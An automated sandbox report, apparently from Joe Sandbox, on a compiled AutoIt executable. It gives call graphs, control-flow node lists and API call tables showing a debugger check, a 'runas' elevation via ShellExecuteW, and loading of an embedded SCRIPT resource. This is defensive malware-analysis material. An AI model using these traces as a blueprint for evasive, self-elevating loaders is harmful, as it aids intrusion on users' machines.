48 API calls 89558->89559 89560 8f22bd 89559->89560 89561 8fd7f7 48 API calls 89560->89561 89562 8f22c8 89561->89562 89563 8fd7f7 48 API calls 89562->89563 89564 8f22d3 89563->89564 89565 8fd7f7 48 API calls 89564->89565 89566 8f22de 89565->89566 89567 8f26a7 48 API calls 89566->89567 89568 8f22e9 89567->89568 89569 90f4ea 48 API calls 89568->89569 89570 8f22f0 89569->89570 89571 961fe7 89570->89571 89572 8f22f9 RegisterWindowMessageW 89570->89572 89572->89521 89574 8f2755 89573->89574 89575 965f4d 89573->89575 89576 90f4ea 48 API calls 89574->89576 89602 93c942 50 API calls 89575->89602 89578 8f275d 89576->89578 89578->89525 89579 965f58 89580->89532 89581->89534 89603 9399df 54 API calls 89581->89603 89589 8f2870 89582->89589 89585 8f2870 48 API calls 89586 8f2864 89585->89586 89587 8fd7f7 48 API calls 89586->89587 89588 8f2716 89587->89588 89588->89539 89590 8fd7f7 48 API calls 89589->89590 89591 8f287b 89590->89591 89592 8fd7f7 48 API calls 89591->89592 89593 8f2883 89592->89593 89594 8fd7f7 48 API calls 89593->89594 89595 8f285c 89594->89595 89595->89585 89596->89543 89598 8fd7f7 48 API calls 89597->89598 89599 8f26b0 89598->89599 89600 8fd7f7 48 API calls 89599->89600 89601 8f265f 89600->89601 89601->89551 89602->89579 89604 8f3742 89605 8f374b 89604->89605 89606 8f3769 89605->89606 89607 8f37c8 89605->89607 89645 8f37c6 89605->89645 89610 8f382c PostQuitMessage 89606->89610 89611 8f3776 89606->89611 89608 8f37ce 89607->89608 89609 961e00 89607->89609 89613 8f37f6 SetTimer RegisterWindowMessageW 89608->89613 89614 8f37d3 89608->89614 89659 8f2ff6 16 API calls 89609->89659 89635 8f37b9 89610->89635 89616 961e88 89611->89616 89617 8f3781 89611->89617 89612 8f37ab DefWindowProcW 89612->89635 89621 8f381f CreatePopupMenu 89613->89621 89613->89635 89618 961da3 89614->89618 89619 8f37da KillTimer 89614->89619 89664 934ddd 60 API calls _memset 89616->89664 89622 8f3789 89617->89622 89623 8f3836 89617->89623 89630 961ddc MoveWindow 89618->89630 89631 961da8 89618->89631 89656 8f3847 Shell_NotifyIconW _memset 89619->89656 89620 961e27 89660 90e312 332 API calls Mailbox 89620->89660 89621->89635 89627 961e6d 89622->89627 89628 8f3794 89622->89628 89649 90eb83 89623->89649 89627->89612 89663 92a5f3 48 API calls 89627->89663 89633 961e58 89628->89633 89642 8f379f 89628->89642 89630->89635 89636 961dac 89631->89636 89637 961dcb SetFocus 89631->89637 89632 8f37ed 89657 8f390f DeleteObject DestroyWindow Mailbox 89632->89657 89662 9355bd 70 API calls _memset 89633->89662 89634 961e9a 89634->89612 89634->89635 89638 961db5 89636->89638 89636->89642 89637->89635 89658 8f2ff6 16 API calls 89638->89658 89642->89612 89661 8f3847 Shell_NotifyIconW _memset 89642->89661 89644 961e68 89644->89635 89645->89612 89647 961e4c 89648 8f4ffc 67 API calls 89647->89648 89648->89645 89650 90eb9a _memset 89649->89650 89651 90ec1c 89649->89651 89652 8f51af 50 API calls 89650->89652 89651->89635 89654 90ebc1 89652->89654 89653 90ec05 KillTimer SetTimer 89653->89651 89654->89653 89655 963c7a Shell_NotifyIconW 89654->89655 89655->89653 89656->89632 89657->89635 89658->89635 89659->89620 89660->89642 89661->89647 89662->89644 89663->89645 89664->89634 89665 96197b 89670 90dd94 89665->89670 89669 96198a 89671 90f4ea 48 API calls 89670->89671 89672 90dd9c 89671->89672 89673 90ddb0 89672->89673 89678 90df3d 89672->89678 89677 910f0a 52 API calls __cinit 89673->89677 89677->89669 89679 90df46 89678->89679 89681 90dda8 89678->89681 89710 910f0a 52 API calls __cinit 89679->89710 89682 90ddc0 89681->89682 89683 8fd7f7 48 API calls 89682->89683 89684 90ddd7 GetVersionExW 89683->89684 89685 8f6a63 48 API calls 89684->89685 89686 90de1a 89685->89686 89711 90dfb4 89686->89711 89689 8f6571 48 API calls 89697 90de2e 89689->89697 89691 9624c8 89693 90dea4 GetCurrentProcess 89724 90df5f LoadLibraryA GetProcAddress 89693->89724 89694 90debb 89695 90df31 GetSystemInfo 89694->89695 89696 90dee3 89694->89696 89700 90df0e 89695->89700 89718 90e00c 89696->89718 89697->89691 89715 90df77 89697->89715 89702 90df21 89700->89702 89703 90df1c FreeLibrary 89700->89703 89702->89673 89703->89702 89704 90df29 GetSystemInfo 89707 90df03 89704->89707 89705 90def9 89721 90dff4 89705->89721 89707->89700 89709 90df09 FreeLibrary 89707->89709 89709->89700 89710->89681 89712 90dfbd 89711->89712 89713 8fb18b 48 API calls 89712->89713 89714 90de22 89713->89714 89714->89689 89725 90df89 89715->89725 89729 90e01e 89718->89729 89722 90e00c 2 API calls 89721->89722 89723 90df01 GetNativeSystemInfo 89722->89723 89723->89707 89724->89694 89726 90dea0 89725->89726 89727 90df92 LoadLibraryA 89725->89727 89726->89693 89726->89694 89727->89726 89728 90dfa3 GetProcAddress 89727->89728 89728->89726 89730 90def1 89729->89730 89731 90e027 LoadLibraryA 89729->89731 89730->89704 89730->89705 89731->89730 89732 90e038 GetProcAddress 89731->89732 89732->89730 89733 968eb8 89737 93a635 89733->89737 89735 968ec3 89736 93a635 85 API calls 89735->89736 89736->89735 89738 93a66f 89737->89738 89742 93a642 89737->89742 89738->89735 89739 93a671 89749 90ec4e 82 API calls 89739->89749 89740 93a676 89743 8f936c 82 API calls 89740->89743 89742->89738 89742->89739 89742->89740 89746 93a669 89742->89746 89744 93a67d 89743->89744 89745 8f510d 48 API calls 89744->89745 89745->89738 89748 904525 61 API calls ___crtGetEnvironmentStringsW 89746->89748 89748->89738 89749->89740 89750 8ff030 89753 903b70 89750->89753 89752 8ff03c 89754 903bc8 89753->89754 89776 9042a5 89753->89776 89755 903bef 89754->89755 89757 966fd1 89754->89757 89760 966f7e 89754->89760 89766 966f9b 89754->89766 89756 90f4ea 48 API calls 89755->89756 89758 903c18 89756->89758 89831 94ceca 332 API calls Mailbox 89757->89831 89761 90f4ea 48 API calls 89758->89761 89760->89755 89762 966f87 89760->89762 89800 903c2c __NMSG_WRITE ___crtGetEnvironmentStringsW 89761->89800 89828 94d552 332 API calls Mailbox 89762->89828 89763 966fbe 89830 93cc5c 87 API calls 4 library calls 89763->89830 89766->89763 89829 94da0e 332 API calls 2 library calls 89766->89829 89767 9042f2 89850 93cc5c 87 API calls 4 library calls 89767->89850 89770 9673b0 89770->89752 89771 967297 89839 93cc5c 87 API calls 4 library calls 89771->89839 89772 96737a 89849 93cc5c 87 API calls 4 library calls 89772->89849 89843 93cc5c 87 API calls 4 library calls 89776->89843 89777 9040df 89840 93cc5c 87 API calls 4 library calls 89777->89840 89779 96707e 89832 93cc5c 87 API calls 4 library calls 89779->89832 89781 8fd6e9 55 API calls 89781->89800 89783 90dce0 53 API calls 89783->89800 89786 8fd645 53 API calls 89786->89800 89788 9672d2 89841 93cc5c 87 API calls 4 library calls 89788->89841 89790 967350 89847 93cc5c 87 API calls 4 library calls 89790->89847 89792 8ffe30 332 API calls 89792->89800 89793 967363 89848 93cc5c 87 API calls 4 library calls 89793->89848 89795 9672e9 89842 93cc5c 87 API calls 4 library calls 89795->89842 89798 8f6a63 48 API calls 89798->89800 89800->89767 89800->89771 89800->89772 89800->89776 89800->89777 89800->89779 89800->89781 89800->89783 89800->89786 89800->89788 89800->89790 89800->89792 89800->89793 89800->89795 89800->89798 89801 8fd286 48 API calls 89800->89801 89802 90f4ea 48 API calls 89800->89802 89803 90c050 48 API calls 89800->89803 89804 96714c 89800->89804 89806 96733f 89800->89806 89808 903f2b 89800->89808 89812 90ee75 48 API calls 89800->89812 89813 8f6eed 48 API calls 89800->89813 89814 9671e1 89800->89814 89824 8fd9a0 53 API calls __cinit 89800->89824 89825 8fd83d 53 API calls 89800->89825 89826 8fcdb9 48 API calls 89800->89826 89827 90c15c 48 API calls 89800->89827 89833 8fdcae 50 API calls Mailbox 89800->89833 89834 94ccdc 48 API calls 89800->89834 89835 93a1eb 50 API calls 89800->89835 89801->89800 89802->89800 89803->89800 89836 94ccdc 48 API calls 89804->89836 89846 93cc5c 87 API calls 4 library calls 89806->89846 89808->89752 89809 9671a1 89838 90c15c 48 API calls 89809->89838 89812->89800 89813->89800 89814->89808 89845 93cc5c 87 API calls 4 library calls 89814->89845 89816 96715f 89816->89809 89837 94ccdc 48 API calls 89816->89837 89818 9671ce 89819 90c050 48 API calls 89818->89819 89821 9671d6 89819->89821 89820 9671ab 89820->89776 89820->89818 89821->89814 89822 967313 89821->89822 89844 93cc5c 87 API calls 4 library calls 89822->89844 89824->89800 89825->89800 89826->89800 89827->89800 89828->89808 89829->89763 89830->89757 89831->89800 89832->89808 89833->89800 89834->89800 89835->89800 89836->89816 89837->89816 89838->89820 89839->89777 89840->89808 89841->89795 89842->89808 89843->89808 89844->89808 89845->89808 89846->89808 89847->89808 89848->89808 89849->89808 89850->89770 89851 1276a28 89865 1274678 89851->89865 89853 1276af0 89868 1276918 89853->89868 89867 1274d03 89865->89867 89871 1277b18 GetPEB 89865->89871 89867->89853 89869 1276921 Sleep 89868->89869 89870 127692f 89869->89870 89871->89867 89872 8fef80 89873 903b70 332 API calls 89872->89873 89874 8fef8c 89873->89874

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 744 91b043-91b080 call 91f8a0 747 91b082-91b084 744->747 748 91b089-91b08b 744->748 749 91b860-91b86c call 91a70c 747->749 750 91b08d-91b0a7 call 917bda call 917c0e call 916e10 748->750 751 91b0ac-91b0d9 748->751 750->749 752 91b0e0-91b0e7 751->752 753 91b0db-91b0de 751->753 757 91b105 752->757 758 91b0e9-91b100 call 917bda call 917c0e call 916e10 752->758 753->752 756 91b10b-91b110 753->756 762 91b112-91b11c call 91f82f 756->762 763 91b11f-91b12d call 923bf2 756->763 757->756 792 91b851-91b854 758->792 762->763 773 91b133-91b145 763->773 774 91b44b-91b45d 763->774 773->774 777 91b14b-91b183 call 917a0d GetConsoleMode 773->777 778 91b463-91b473 774->778 779 91b7b8-91b7d5 WriteFile 774->779 777->774 796 91b189-91b18f 777->796 782 91b479-91b484 778->782 783 91b55a-91b55f 778->783 785 91b7e1-91b7e7 GetLastError 779->785 786 91b7d7-91b7df 779->786 790 91b81b-91b833 782->790 791 91b48a-91b49a 782->791 787 91b663-91b66e 783->787 788 91b565-91b56e 783->788 793 91b7e9 785->793 786->793 787->790 800 91b674 787->800 788->790 794 91b574 788->794 798 91b835-91b838 790->798 799 91b83e-91b84e call 917c0e call 917bda 790->799 797 91b4a0-91b4a3 791->797 795 91b85e-91b85f 792->795 801 91b7ef-91b7f1 793->801 804 91b57e-91b595 794->804 795->749 805 91b191-91b193 796->805 806 91b199-91b1bc GetConsoleCP 796->806 807 91b4a5-91b4be 797->807 808 91b4e9-91b520 WriteFile 797->808 798->799 809 91b83a-91b83c 798->809 799->792 810 91b67e-91b693 800->810 802 91b7f3-91b7f5 801->802 803 91b856-91b85c 801->803 802->790 812 91b7f7-91b7fc 802->812 803->795 813 91b59b-91b59e 804->813 805->774 805->806 814 91b440-91b446 806->814 815 91b1c2-91b1ca 806->815 816 91b4c0-91b4ca 807->816 817 91b4cb-91b4e7 807->817 808->785 818 91b526-91b538 808->818 809->795 819 91b699-91b69b 810->819 822 91b812-91b819 call 917bed 812->822 823 91b7fe-91b810 call 917c0e call 917bda 812->823 824 91b5a0-91b5b6 813->824 825 91b5de-91b627 WriteFile 813->825 814->802 826 91b1d4-91b1d6 815->826 816->817 817->797 817->808 818->801 827 91b53e-91b54f 818->827 828 91b6d8-91b719 WideCharToMultiByte 819->828 829 91b69d-91b6b3 819->829 822->792 823->792 835 91b5b8-91b5ca 824->835 836 91b5cd-91b5dc 824->836 825->785 838 91b62d-91b645 825->838 839 91b36b-91b36e 826->839 840 91b1dc-91b1fe 826->840 827->791 841 91b555 827->841 828->785 834 91b71f-91b721 828->834 830 91b6b5-91b6c4 829->830 831 91b6c7-91b6d6 829->831 830->831 831->819 831->828 845 91b727-91b75a WriteFile 834->845 835->836 836->813 836->825 838->801 847 91b64b-91b658 838->847 842 91b370-91b373 839->842 843 91b375-91b3a2 839->843 848 91b200-91b215 840->848 849 91b217-91b223 call 911688 840->849 841->801 842->843 850 91b3a8-91b3ab 842->850 843->850 852 91b77a-91b78e GetLastError 845->852 853 91b75c-91b776 845->853 847->804 854 91b65e 847->854 855 91b271-91b283 call 9240f7 848->855 868 91b225-91b239 849->868 869 91b269-91b26b 849->869 857 91b3b2-91b3c5 call 925884 850->857 858 91b3ad-91b3b0 850->858 862 91b794-91b796 852->862 853->845 860 91b778 853->860 854->801 873 91b435-91b43b 855->873 874 91b289 855->874 857->785 878 91b3cb-91b3d5 857->878 858->857 864 91b407-91b40a 858->864 860->862 862->793 867 91b798-91b7b0 862->867 864->826 876 91b410 864->876 867->810 875 91b7b6 867->875 870 91b412-91b42d 868->870 871 91b23f-91b254 call 9240f7 868->871 869->855 870->873 871->873 884 91b25a-91b267 871->884 873->793 879 91b28f-91b2c4 WideCharToMultiByte 874->879 875->801 876->873 881 91b3d7-91b3ee call 925884 878->881 882 91b3fb-91b401 878->882 879->873 883 91b2ca-91b2f0 WriteFile 879->883 881->785 889 91b3f4-91b3f5 881->889 882->864 883->785 886 91b2f6-91b30e 883->886 884->879 886->873 888 91b314-91b31b 886->888 888->882 890 91b321-91b34c WriteFile 888->890 889->882 890->785 891 91b352-91b359 890->891 891->873 892 91b35f-91b366 891->892 892->882
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00453e357cfab28cd2bbfd4af89b9f291f56ce2373450e7b79de4452d560b8de
                                                                        • Instruction ID: 2ebe094cd1730073b25902905db87bb66b2902dbb19abe4e2c7ba61b59734531
                                                                        • Opcode Fuzzy Hash: 00453e357cfab28cd2bbfd4af89b9f291f56ce2373450e7b79de4452d560b8de
                                                                        • Instruction Fuzzy Hash: 77326975B022298BDB248F14DD816E9B7BAFF4A310F5841D9E40AE7A91D7309EC0CF52

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008F3AA3,?), ref: 008F3D45
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,008F3AA3,?), ref: 008F3D57
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,009B1148,009B1130,?,?,?,?,008F3AA3,?), ref: 008F3DC8
                                                                          • Part of subcall function 008F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008F3DEE,009B1148,?,?,?,?,?,008F3AA3,?), ref: 008F6471
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,008F3AA3,?), ref: 008F3E48
                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009A28F4,00000010), ref: 00961CCE
                                                                        • SetCurrentDirectoryW.KERNEL32(?,009B1148,?,?,?,?,?,008F3AA3,?), ref: 00961D06
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0098DAB4,009B1148,?,?,?,?,?,008F3AA3,?), ref: 00961D89
                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,008F3AA3), ref: 00961D90
                                                                          • Part of subcall function 008F3E6E: GetSysColorBrush.USER32(0000000F), ref: 008F3E79
                                                                          • Part of subcall function 008F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008F3E88
                                                                          • Part of subcall function 008F3E6E: LoadIconW.USER32(00000063), ref: 008F3E9E
                                                                          • Part of subcall function 008F3E6E: LoadIconW.USER32(000000A4), ref: 008F3EB0
                                                                          • Part of subcall function 008F3E6E: LoadIconW.USER32(000000A2), ref: 008F3EC2
                                                                          • Part of subcall function 008F3E6E: RegisterClassExW.USER32(?), ref: 008F3F30
                                                                          • Part of subcall function 008F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F36E6
                                                                          • Part of subcall function 008F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3707
                                                                          • Part of subcall function 008F36B8: ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F371B
                                                                          • Part of subcall function 008F36B8: ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F3724
                                                                          • Part of subcall function 008F4FFC: _memset.LIBCMT ref: 008F5022
                                                                          • Part of subcall function 008F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F50CB
                                                                        Strings
                                                                        • This is a third-party compiled AutoIt script., xrefs: 00961CC8
                                                                        • runas, xrefs: 00961D84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 438480954-3287110873
                                                                        • Opcode ID: 765b09837ec272f930cacb933329537081c98e58ceb164e543dc2033c2ff920e
                                                                        • Instruction ID: 9534aa69d04fb7bf481c098052ddc6f5d9cbf0edac3cd8601417482cfc879a74
                                                                        • Opcode Fuzzy Hash: 765b09837ec272f930cacb933329537081c98e58ceb164e543dc2033c2ff920e
                                                                        • Instruction Fuzzy Hash: D8510531A0C24CBACB11ABBCDD61EFE7B79FF45B14F004264F341E2192DA7456459B22

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1141 90ddc0-90de4f call 8fd7f7 GetVersionExW call 8f6a63 call 90dfb4 call 8f6571 1150 90de55-90de56 1141->1150 1151 9624c8-9624cb 1141->1151 1152 90de92-90dea2 call 90df77 1150->1152 1153 90de58-90de63 1150->1153 1154 9624e4-9624e8 1151->1154 1155 9624cd 1151->1155 1172 90dea4-90dec1 GetCurrentProcess call 90df5f 1152->1172 1173 90dec7-90dee1 1152->1173 1158 96244e-962454 1153->1158 1159 90de69-90de6b 1153->1159 1156 9624d3-9624dc 1154->1156 1157 9624ea-9624f3 1154->1157 1161 9624d0 1155->1161 1156->1154 1157->1161 1164 9624f5-9624f8 1157->1164 1162 962456-962459 1158->1162 1163 96245e-962464 1158->1163 1165 90de71-90de74 1159->1165 1166 962469-962475 1159->1166 1161->1156 1162->1152 1163->1152 1164->1156 1170 962495-962498 1165->1170 1171 90de7a-90de89 1165->1171 1168 962477-96247a 1166->1168 1169 96247f-962485 1166->1169 1168->1152 1169->1152 1170->1152 1176 96249e-9624b3 1170->1176 1177 96248a-962490 1171->1177 1178 90de8f 1171->1178 1172->1173 1191 90dec3 1172->1191 1174 90df31-90df3b GetSystemInfo 1173->1174 1175 90dee3-90def7 call 90e00c 1173->1175 1184 90df0e-90df1a 1174->1184 1188 90df29-90df2f GetSystemInfo 1175->1188 1189 90def9-90df01 call 90dff4 GetNativeSystemInfo 1175->1189 1181 9624b5-9624b8 1176->1181 1182 9624bd-9624c3 1176->1182 1177->1152 1178->1152 1181->1152 1182->1152 1186 90df21-90df26 1184->1186 1187 90df1c-90df1f FreeLibrary 1184->1187 1187->1186 1193 90df03-90df07 1188->1193 1189->1193 1191->1173 1193->1184 1195 90df09-90df0c FreeLibrary 1193->1195 1195->1184
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 0090DDEC
                                                                        • GetCurrentProcess.KERNEL32(00000000,0098DC38,?,?), ref: 0090DEAC
                                                                        • GetNativeSystemInfo.KERNELBASE(?,0098DC38,?,?), ref: 0090DF01
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0090DF0C
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0090DF1F
                                                                        • GetSystemInfo.KERNEL32(?,0098DC38,?,?), ref: 0090DF29
                                                                        • GetSystemInfo.KERNEL32(?,0098DC38,?,?), ref: 0090DF35
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                        • String ID:
                                                                        • API String ID: 3851250370-0
                                                                        • Opcode ID: 53e575a9f1aff73a5f5468baf3291014b6cebcd0911bb04e25abe904bf5e7d72
                                                                        • Instruction ID: a51c9e0c5f9607c1796013f08955bd3abf00ac4d92c4548bac71a2e97ad02826
                                                                        • Opcode Fuzzy Hash: 53e575a9f1aff73a5f5468baf3291014b6cebcd0911bb04e25abe904bf5e7d72
                                                                        • Instruction Fuzzy Hash: CE61C57181B384DFCF15CFA898C11EDBFB4AF29300B1989D9D9459F247C624C949CB69

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1213 8f406b-8f4083 CreateStreamOnHGlobal 1214 8f4085-8f409c FindResourceExW 1213->1214 1215 8f40a3-8f40a6 1213->1215 1216 964f16-964f25 LoadResource 1214->1216 1217 8f40a2 1214->1217 1216->1217 1218 964f2b-964f39 SizeofResource 1216->1218 1217->1215 1218->1217 1219 964f3f-964f4a LockResource 1218->1219 1219->1217 1220 964f50-964f6e 1219->1220 1220->1217
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008F449E,?,?,00000000,00000001), ref: 008F407B
                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008F449E,?,?,00000000,00000001), ref: 008F4092
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,008F449E,?,?,00000000,00000001,?,?,?,?,?,?,008F41FB), ref: 00964F1A
                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,008F449E,?,?,00000000,00000001,?,?,?,?,?,?,008F41FB), ref: 00964F2F
                                                                        • LockResource.KERNEL32(008F449E,?,?,008F449E,?,?,00000000,00000001,?,?,?,?,?,?,008F41FB,00000000), ref: 00964F42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: SCRIPT
                                                                        • API String ID: 3051347437-3967369404
                                                                        • Opcode ID: 6f71d4a71f268fa566529f7db64df75644decc7130bdf9e0b7d81462d07a65c5
                                                                        • Instruction ID: 4e5f895da99d1e058dc338e2bd28ef2cd681476ad81d817249f1a196af247755
                                                                        • Opcode Fuzzy Hash: 6f71d4a71f268fa566529f7db64df75644decc7130bdf9e0b7d81462d07a65c5
                                                                        • Instruction Fuzzy Hash: 4E115A71204705AFE7218B65EC48F277BB9EFC5B51F10412DF616D62A0DAB1EC41AA20
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00962F49), ref: 00936CB9
                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00936CCA
                                                                        • FindClose.KERNEL32(00000000), ref: 00936CDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: 1d735a3bbee452a9233f49857120ec77171a9cda8403ce687a402cdb1cd0d406
                                                                        • Instruction ID: d10b053ab55c9dd771f6c04ea538a3402c95f538cf3cdf53a3d0a42653bb80bc
                                                                        • Opcode Fuzzy Hash: 1d735a3bbee452a9233f49857120ec77171a9cda8403ce687a402cdb1cd0d406
                                                                        • Instruction Fuzzy Hash: 7EE0483282A5156782146738EC0D8E9777CDE0533AF504715F5F5C11D0E774E9449AE5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID: @
                                                                        • API String ID: 3728558374-2766056989
                                                                        • Opcode ID: 8eda5575326629794551e3494c65d8df63d6496102a205af1ed1477dff74a96e
                                                                        • Instruction ID: 43ea6ef2318b1c711323bb9a42bbde4789fd68c7c1f01c33c16c1b3d29a31138
                                                                        • Opcode Fuzzy Hash: 8eda5575326629794551e3494c65d8df63d6496102a205af1ed1477dff74a96e
                                                                        • Instruction Fuzzy Hash: 8972AD70E04209DFDB14EF98C481ABEB7BAEF48304F14C45AEA15AB291D735AE45CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
